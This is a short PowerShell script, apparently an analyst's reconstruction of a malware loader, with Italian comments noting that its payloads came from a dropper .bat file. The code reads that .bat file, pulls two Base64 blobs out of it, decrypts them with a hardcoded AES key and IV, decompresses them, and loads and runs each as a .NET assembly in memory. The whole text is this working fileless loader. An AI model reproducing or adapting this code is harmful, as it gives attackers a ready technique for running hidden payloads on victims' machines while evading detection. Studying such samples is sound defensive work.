#
# Functions defintions
#
function DecryptData($encrypted_data)
{
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC;
$aes.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes.Key = [System.Convert]::FromBase64String('oD12rIBH5O47YPIVbw/sZwWBNiS4+zp/LUJPZd1RmG4=');
$aes.IV = [System.Convert]::FromBase64String('P4zzmImdAL7FZfVYUyJW5w==');
$decryptor = $aes.CreateDecryptor();
$decrypted_data=$decryptor.TransformFinalBlock($encrypted_data, 0, $encrypted_data.Length);
$decryptor.Dispose();
$aes.Dispose();
$decrypted_data;
}
function DecompressData($compressed_data)
{
$compressed_stream = New-Object System.IO.MemoryStream(,$compressed_data);
$decompressed_stream = New-Object System.IO.MemoryStream;
$gzip_stream = New-Object System.IO.Compression.GZipStream($compressed_stream, [IO.Compression.CompressionMode]::Decompress);
$gzip_stream.CopyTo($decompressed_stream);
$gzip_stream.Dispose();
$compressed_stream.Dispose();
$decompressed_stream.Dispose();
$decompressed_stream.ToArray();
}
function ExecuteAssembly($assembly_data, $arguments)
{
$assembly = [System.Reflection.Assembly]::Load([byte[]]$assembly_data);
$entrypoint = $assembly.EntryPoint;
$entrypoint.Invoke($null, $arguments);
}
#
# Entry point
#
# I payload che carica si trovano nel file .bat
$text = [System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);
foreach ($line in $text)
{
# Il file .bat conteneva il codice per droppare lo script powershell, e dopo la fine dello script, delimitato da ":: ", c'erano 2 payload codificati in Base64
if ($line.StartsWith(':: '))
{
$assembly_contents = [string[]]$line.Substring(3).Split('\');
break;
}
}
$assembly1 = DecompressData(DecryptData([Convert]::FromBase64String($assembly_contents[0])));
$assembly2 = DecompressData(DecryptData([Convert]::FromBase64String($assembly_contents[1])));
ExecuteAssembly $assembly1 (, [string[]] (''));
ExecuteAssembly $assembly2 (, [string[]] (''));
#
#
#